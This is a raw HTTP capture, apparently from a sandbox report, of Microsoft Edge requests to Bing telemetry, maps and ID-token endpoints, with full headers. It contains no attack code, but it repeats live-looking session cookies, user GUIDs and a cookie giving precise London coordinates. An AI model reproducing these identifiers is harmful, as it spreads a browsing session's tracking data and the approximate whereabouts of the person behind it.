cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a10aeb5445f9f9c2a77be924c0a
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-SbpfnvylZ5Ze8vxDMZx8KFUyPsABvGI5niGuKr85HIc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: E17FF3F7647E487FB57577A0BDB1E81D Ref B: LON212050703025 Ref C: 2024-12-04T10:08:16Z
date: Wed, 04 Dec 2024 10:08:16 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:16 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:16 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10acd
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10adf
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887027%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 47895
content-type: application/javascript; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a108ba54b4ea90670445d933f66
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-frame-options: DENY
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-jSTmKRQNBx1GvyCGP+7caF8y9lPBzFPVAFEuKPGPBsQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingmap&ndcParam=QWthbWFp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10afa
GET

https://www.bing.com/maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/mapcontrol/v9/overlay?callback=initializeMap&partner=serp&branch=experimental HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10b83
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887183%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887183%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

cache-control: private
content-length: 313
content-type: application/json; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a0f536a4e6c90d8e1f0ae1067b9
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-pjoOuUL8zY/aqi0VWmxH9c97vFDWffyd1xTjwwq2k2k='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 84A835D6D04D4FF6943C68C7B23D3497 Ref B: LON212050706025 Ref C: 2024-12-04T10:08:15Z
date: Wed, 04 Dec 2024 10:08:16 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:15 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10a39
POST

https://www.bing.com/orgid/idtoken/conditional

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693

Response

HTTP/2.0 200

content-length: 16142
content-type: application/json; charset=utf-8
access-control-allow-credentials: true
access-control-allow-origin: https://www.bing.com
cache-control: public, max-age=8640000
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a100ccf46ca8f5fb433947acf7a
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-frame-options: DENY
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-rvHx+clgCxkD+EiNJhSxCI7LCD5bUdP/Ewush12TE0o='; base-uri 'self';report-to csp-endpoint
